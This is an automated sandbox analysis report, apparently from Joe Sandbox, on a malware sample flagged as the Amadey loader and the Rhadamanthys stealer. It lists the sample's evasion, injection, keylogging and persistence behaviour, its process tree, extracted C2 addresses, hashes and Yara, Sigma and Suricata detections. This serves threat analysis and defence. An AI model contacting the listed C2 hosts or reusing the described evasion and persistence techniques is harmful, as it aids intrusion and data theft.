Edit tour

Windows Analysis Report
9ua5N7dcBZ.exe

Overview

General Information

Sample name:	9ua5N7dcBZ.exe renamed because original name is a hash value
Original sample name:	ad452771a6e039f2d06bd873f4705705.exe
Analysis ID:	1636380
MD5:	ad452771a6e039f2d06bd873f4705705
SHA1:	f4967a8287e4afec24f0684e529031f62dcfc9f2
SHA256:	d9f6e61cf394dd0cb81ec6dd60e16050cd202a3fbe5f7be39435b1b942e511f2
Tags:	exeRhadamanthysuser-abuse_ch
Infos:

Detection

Amadey, RHADAMANTHYS

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected RHADAMANTHYS Stealer

.NET source code contains potential unpacker

.NET source code contains very large strings

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Queues an APC in another process (thread injection)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Dllhost Internet Connection

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

9ua5N7dcBZ.exe (PID: 8316 cmdline: "C:\Users\user\Desktop\9ua5N7dcBZ.exe" MD5: AD452771A6E039F2D06BD873F4705705)

update.exe (PID: 8368 cmdline: "C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

Gxtuum.exe (PID: 8440 cmdline: "C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

Gxtuum.exe (PID: 8500 cmdline: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

readerupdate2.exe (PID: 8624 cmdline: "C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe" MD5: 19D57E03E2F9D5DA05A8F6EDD5EB1E95)

rdha.exe (PID: 8676 cmdline: "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

svchost.exe (PID: 8716 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

fontdrvhost.exe (PID: 9024 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

WerFault.exe (PID: 9140 cmdline: C:\Windows\system32\WerFault.exe -u -p 9024 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

readerupdate2.exe (PID: 9212 cmdline: "C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe" MD5: 19D57E03E2F9D5DA05A8F6EDD5EB1E95)

rdha.exe (PID: 7092 cmdline: "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

svchost.exe (PID: 3676 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

svchost.exe (PID: 5056 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

chrome.exe (PID: 8320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 3508 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr3549.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/d64e6a9d/c462449b" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 3328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2408,i,17781879353702951408,17998712675183720793,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

msedge.exe (PID: 6424 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr40D3.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/d64e6a9d/c7af6c55" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9128 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2540 --field-trial-handle=2044,i,15576995492371411568,11296989779749965801,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

wmpnscfg.exe (PID: 3428 cmdline: "C:\Program Files\Windows Media Player\wmpnscfg.exe" MD5: F912FF78DE347834EA56CEB0E12F80EC)

dllhost.exe (PID: 4076 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)

readerupdate2.exe (PID: 892 cmdline: "C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe" MD5: 19D57E03E2F9D5DA05A8F6EDD5EB1E95)

rdha.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

svchost.exe (PID: 344 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

svchost.exe (PID: 5444 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

chrome.exe (PID: 6868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6360 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6235.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c517716a/c462449b" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,1738051838686581757,9242174094386014709,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

msedge.exe (PID: 7484 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6E2C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c517716a/c7af6c55" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7536 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2212,i,3169092561735658091,5359822219130930999,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

elevation_service.exe (PID: 8444 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

elevation_service.exe (PID: 8460 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

elevation_service.exe (PID: 8428 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

elevation_service.exe (PID: 808 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

elevation_service.exe (PID: 3272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

elevation_service.exe (PID: 6180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

elevation_service.exe (PID: 6764 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

elevation_service.exe (PID: 8332 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)

AvastBrowserUpdate.exe (PID: 8756 cmdline: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe MD5: CD31FA4FDCBB7BC1CF21B97A8C95704D)

svchost.exe (PID: 8796 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://96.9.125.78:1432/c9c0a58659bbbb6615bc38c/pd8un5fd.jkuna"}

Threatname: Amadey

{"C2 url": "45.93.20.224/pNdj30Vs11/index.php", "Version": "5.30", "Install Folder": "3140a3c17c", "Install File": "Gxtuum.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000003.1697994530.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000003.1620431709.00000000032A0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000F.00000003.1612057695.0000000000140000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000013.00000003.1697867340.00000000024D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x7d32a:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x80860:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000003.1459630648.0000000003020000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000014.00000003.1705857758.0000000005520000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000010.00000003.1621277287.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000003.1621387285.00000000024C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x7d32a:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x80860:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000006.00000003.1460759319.0000000003040000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000005.00000003.1459821006.0000000003240000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000010.00000003.1624398459.00000000055A0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000014.00000003.1705586750.0000000005300000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000003.1452899533.0000000000520000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000003.1620149862.0000000003080000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.1525068541.00000000030E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000003.1462888323.0000000005210000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000014.00000002.1760142384.00000000033E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000005.00000003.1460774355.00000000028E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000010.00000002.1682405399.0000000003480000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000001.00000002.1336328795.0000000002500000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x6cd37:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x7026d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000010.00000003.1624135816.0000000005380000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000003.1460689695.00000000024C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x7d32a:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x80860:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000006.00000003.1462640595.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000013.00000003.1693948772.0000000000180000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000013.00000003.1697033886.0000000003250000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000013.00000003.1696830808.0000000003030000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000002.00000002.1337387852.0000000000770000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000002.00000002.1337055476.00000000006F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x6cd37:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x7026d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000013.00000003.1697999460.00000000028F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000003.1621486479.0000000002940000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: rdha.exe PID: 8676	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost.exe PID: 8716	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: rdha.exe PID: 7092	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author
19.3.rdha.exe.3250000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.3.rdha.exe.3030000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.svchost.exe.5380000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.3.rdha.exe.3240000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.3.svchost.exe.4ff0000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.3.svchost.exe.5210000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
20.3.svchost.exe.5520000.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
20.3.svchost.exe.5520000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
20.3.svchost.exe.5300000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
16.3.svchost.exe.55a0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
15.3.rdha.exe.32a0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
15.3.rdha.exe.32a0000.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.3.rdha.exe.3020000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
15.3.rdha.exe.3080000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe, ProcessId: 8500, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\readerupdate2.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe, ProcessId: 8500, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\readerupdate2.exe

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 96.9.125.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 4076, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49795

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe, ParentProcessId: 8676, ParentProcessName: rdha.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8716, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe, ParentProcessId: 8676, ParentProcessName: rdha.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8716, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Amadey Bot Activity (POST) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T18:02:22.288680+0100	2044597	1	A Network Trojan was detected	192.168.2.5	49713	45.93.20.224	80	TCP

ETPRO JA3 HASH Suspected Malware Related Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T18:03:03.197975+0100	2854824	2	Potentially Bad Traffic	96.9.125.78	1432	192.168.2.5	49755	TCP
2025-03-12T18:03:12.898510+0100	2854824	2	Potentially Bad Traffic	96.9.125.78	1432	192.168.2.5	49775	TCP
2025-03-12T18:03:15.236648+0100	2854824	2	Potentially Bad Traffic	96.9.125.78	1432	192.168.2.5	49785	TCP
2025-03-12T18:03:24.913382+0100	2854824	2	Potentially Bad Traffic	96.9.125.78	1432	192.168.2.5	49798	TCP
2025-03-12T18:03:42.093229+0100	2854824	2	Potentially Bad Traffic	96.9.125.78	1432	192.168.2.5	49825	TCP
2025-03-12T18:03:51.352963+0100	2854824	2	Potentially Bad Traffic	96.9.125.78	1432	192.168.2.5	49831	TCP
2025-03-12T18:04:03.011938+0100	2854824	2	Potentially Bad Traffic	96.9.125.78	1432	192.168.2.5	49839	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T18:02:10.445057+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49708	45.93.20.224	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T18:02:12.667485+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49709	45.93.20.224	80	TCP
2025-03-12T18:02:29.887607+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49720	45.93.20.224	80	TCP
2025-03-12T18:02:34.425334+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49725	45.93.20.224	80	TCP
2025-03-12T18:02:38.985652+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49728	45.93.20.224	80	TCP
2025-03-12T18:02:43.569342+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49730	45.93.20.224	80	TCP
2025-03-12T18:02:48.109845+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49733	45.93.20.224	80	TCP
2025-03-12T18:02:52.655106+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49735	45.93.20.224	80	TCP
2025-03-12T18:02:57.383543+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49737	45.93.20.224	80	TCP
2025-03-12T18:03:02.167062+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49753	45.93.20.224	80	TCP
2025-03-12T18:03:06.683498+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49759	45.93.20.224	80	TCP
2025-03-12T18:03:11.482416+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49774	45.93.20.224	80	TCP
2025-03-12T18:03:16.716747+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49786	45.93.20.224	80	TCP
2025-03-12T18:03:21.243579+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49796	45.93.20.224	80	TCP
2025-03-12T18:03:25.774879+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49799	45.93.20.224	80	TCP
2025-03-12T18:03:30.325710+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49803	45.93.20.224	80	TCP
2025-03-12T18:03:35.000498+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49806	45.93.20.224	80	TCP
2025-03-12T18:03:39.563321+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49808	45.93.20.224	80	TCP
2025-03-12T18:03:44.221458+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49826	45.93.20.224	80	TCP
2025-03-12T18:03:48.793109+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49829	45.93.20.224	80	TCP
2025-03-12T18:03:53.318404+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49832	45.93.20.224	80	TCP
2025-03-12T18:03:57.988378+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49835	45.93.20.224	80	TCP
2025-03-12T18:04:02.562343+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49837	45.93.20.224	80	TCP
2025-03-12T18:04:07.251602+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49841	45.93.20.224	80	TCP

ETPRO MALWARE Amadey CnC Activity M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T18:02:22.288680+0100	2856149	1	A Network Trojan was detected	192.168.2.5	49713	45.93.20.224	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T18:02:14.866979+0100	2803305	3	Unknown Traffic	192.168.2.5	49710	45.93.20.224	80	TCP

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T18:02:22.663376+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49714	TCP
2025-03-12T18:02:38.415450+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49727	TCP
